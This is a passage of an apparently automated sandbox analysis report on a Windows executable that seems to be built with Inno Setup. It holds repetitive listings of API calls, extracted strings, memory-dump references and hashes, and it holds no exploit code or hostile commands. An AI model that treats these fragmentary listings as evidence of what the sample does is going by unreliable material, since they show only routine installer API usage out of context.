                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                              • String ID:
                                                                              • API String ID: 225703358-0
                                                                              • Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                              • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                              • Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                              • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004631B8
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046324D), ref: 004631BE
                                                                              • SetCursor.USER32(?,00463235,00007F02,00000000,0046324D), ref: 00463228
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load
                                                                              • String ID: $ $Internal error: Item already expanding
                                                                              • API String ID: 1675784387-1948079669
                                                                              • Opcode ID: 9a907484170bb085a46c4a598b93bfbbd2bc194262705c34c2f461fc244cfbd4
                                                                              • Instruction ID: 06b17efc2869e1117ca0a97e11558f018c2dd138a4dd01a316207194f11c04f7
                                                                              • Opcode Fuzzy Hash: 9a907484170bb085a46c4a598b93bfbbd2bc194262705c34c2f461fc244cfbd4
                                                                              • Instruction Fuzzy Hash: 74B1B430A00284DFD711DF69C585B9EBBF0BF04305F1484AAE8459B792DB78EE45CB16
                                                                              APIs
                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileStringWrite
                                                                              • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                              • API String ID: 390214022-3304407042
                                                                              • Opcode ID: 4acafb8f8444067680350d3d4e03481623aa06ca7574397e5033f2f4cf45a0b5
                                                                              • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                              • Opcode Fuzzy Hash: 4acafb8f8444067680350d3d4e03481623aa06ca7574397e5033f2f4cf45a0b5
                                                                              • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                              APIs
                                                                              • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004767C9
                                                                              • SetWindowLongW.USER32(00000000,000000FC,00476724), ref: 004767F0
                                                                              • GetACP.KERNEL32(00000000,00476A08,?,00000000,00476A32), ref: 0047682D
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476873
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ClassInfoLongMessageSendWindow
                                                                              • String ID: COMBOBOX$Inno Setup: Language
                                                                              • API String ID: 3391662889-4234151509
                                                                              • Opcode ID: 7b097581a500be05759954e33284123b2b89370f46c26a428eff7c4db0c5a69c
                                                                              • Instruction ID: bb27e68bfa0a4e6e36c1c9b1f46c00cfa2f47713d75b81585866a7fa3ef15c14
                                                                              • Opcode Fuzzy Hash: 7b097581a500be05759954e33284123b2b89370f46c26a428eff7c4db0c5a69c
                                                                              • Instruction Fuzzy Hash: C0813F746006059FC710EF69D885AEAB7F2FB09304F16C1BAE848E7362D738AD45CB59
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                              • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                              • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                              • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                              • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                              • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                              • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                              • String ID: ,$?
                                                                              • API String ID: 2359071979-2308483597
                                                                              • Opcode ID: b9a2b6ccc88d9caa62c3975205c07352f987ccdbf84bf9e0cd5a88eec52abf91
                                                                              • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                              • Opcode Fuzzy Hash: b9a2b6ccc88d9caa62c3975205c07352f987ccdbf84bf9e0cd5a88eec52abf91
                                                                              • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                              APIs
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                              • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                              • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                              • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                              • String ID:
                                                                              • API String ID: 1030595962-0
                                                                              • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                              • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                              • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                              • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                              APIs
                                                                              • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                              • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                              • RealizePalette.GDI32(?), ref: 0041CF92
                                                                              • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                              • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                              • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                              • String ID:
                                                                              • API String ID: 2222416421-0
                                                                              • Opcode ID: c6a16a19dcf28552bada6898b81586dc49cb1edacb7efb66bca37046f5d7e7da
                                                                              • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                              • Opcode Fuzzy Hash: c6a16a19dcf28552bada6898b81586dc49cb1edacb7efb66bca37046f5d7e7da
                                                                              • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,?,?), ref: 0045717A
                                                                                • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571E1
                                                                              • TranslateMessage.USER32(?), ref: 004571FF
                                                                              • DispatchMessageA.USER32(?), ref: 00457208
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                              • String ID: [Paused]
                                                                              • API String ID: 1007367021-4230553315
                                                                              • Opcode ID: fd37f0685e9949bc630816f418b91ae10989fde9f4c26f7dfdebc9041f05c988
                                                                              • Instruction ID: 9c65c5789669556775cb04b7d8b700a3e8427f17a0623b42c67a15115a154b53
                                                                              • Opcode Fuzzy Hash: fd37f0685e9949bc630816f418b91ae10989fde9f4c26f7dfdebc9041f05c988
                                                                              • Instruction Fuzzy Hash: 3A3196309082449EDB11DFB5EC81FDEBBB8EB49314F5580B7F800E7292D6389909CB69
                                                                              APIs
                                                                              • GetCursor.USER32(00000000,0046B3D3), ref: 0046B350
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0046B35E
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B3D3), ref: 0046B364
                                                                              • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B3D3), ref: 0046B36E
                                                                              • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B3D3), ref: 0046B374
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LoadSleep
                                                                              • String ID: CheckPassword
                                                                              • API String ID: 4023313301-1302249611
                                                                              • Opcode ID: 9ec6fbb627a2037d8b10d3b03f13e16da416f17f6db7f06dbaba65bff406c05b
                                                                              • Instruction ID: 12e539274ef1f9e2a04eba0c68275a436143f563f239c7c10787bf1112b5c925
                                                                              • Opcode Fuzzy Hash: 9ec6fbb627a2037d8b10d3b03f13e16da416f17f6db7f06dbaba65bff406c05b
                                                                              • Instruction Fuzzy Hash: 883140347402449FD711DB69C899B9A7BE4EB05304F5580B6BC44DB392D7789E80CB99
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045968F
                                                                              Strings
                                                                              • Fusion.dll, xrefs: 0045962F
                                                                              • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045969A
                                                                              • CreateAssemblyCache, xrefs: 00459686
                                                                              • Failed to load .NET Framework DLL "%s", xrefs: 00459674
                                                                              • .NET Framework CreateAssemblyCache function failed, xrefs: 004596B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                              • API String ID: 190572456-3990135632
                                                                              • Opcode ID: c76a925808990de0a4edfa3a9bd9e2f18b95e6c6c4d3f27ecf656a26428a2687
                                                                              • Instruction ID: 16de9e68b372fd706bfdce8394bce33e03e331de8444419fbf47e642e04e3cf3
                                                                              • Opcode Fuzzy Hash: c76a925808990de0a4edfa3a9bd9e2f18b95e6c6c4d3f27ecf656a26428a2687
                                                                              • Instruction Fuzzy Hash: E1318B71E10605EBCB01EFA9C88159EB7B4EF44315F50857BE814E7382DB389E08C799
                                                                              APIs
                                                                                • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                              • GetFocus.USER32 ref: 0041C168
                                                                              • GetDC.USER32(?), ref: 0041C174
                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                              • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                              • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                              • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                              • String ID:
                                                                              • API String ID: 3303097818-0
                                                                              • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                              • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                              • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                              • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                              • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                              • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                • Part of subcall function 004107F8: 6F51C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                              • 6F58CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                              • 6F58C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                              • 6F58CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                              • 6F520860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$C400C740F520860F522980
                                                                              • String ID:
                                                                              • API String ID: 2856677924-0
                                                                              • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                              • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                              • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                              • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483808), ref: 004837ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                              • API String ID: 47109696-2530820420
                                                                              • Opcode ID: 6cffb51fcf675e5b5ff337e99a1a510b156e53e1e1d602fe7582bc6a3ac7d990
                                                                              • Instruction ID: c613687e0df8eb2305741995cd8b82d1e16d8def3fb188134640bd78fd3b844b
                                                                              • Opcode Fuzzy Hash: 6cffb51fcf675e5b5ff337e99a1a510b156e53e1e1d602fe7582bc6a3ac7d990
                                                                              • Instruction Fuzzy Hash: 7711AFB0B00204AAD700FBA68C12A5EBAE8DB55B09F208877A800E7681E73CDB01875C
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00495089
                                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004950AB
                                                                              • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495629), ref: 004950BF
                                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004950E1
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004950FE
                                                                              Strings
                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004950B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                              • API String ID: 2948443157-222967699
                                                                              • Opcode ID: 53fe9a462762cb4918ee61071ab08c48f7ebae39ed882d9ecfdb03bcb5db6ebb
                                                                              • Instruction ID: d310c62e5609ca3062061d10b625b1d271ae10615434581f3ecc8597d6741426
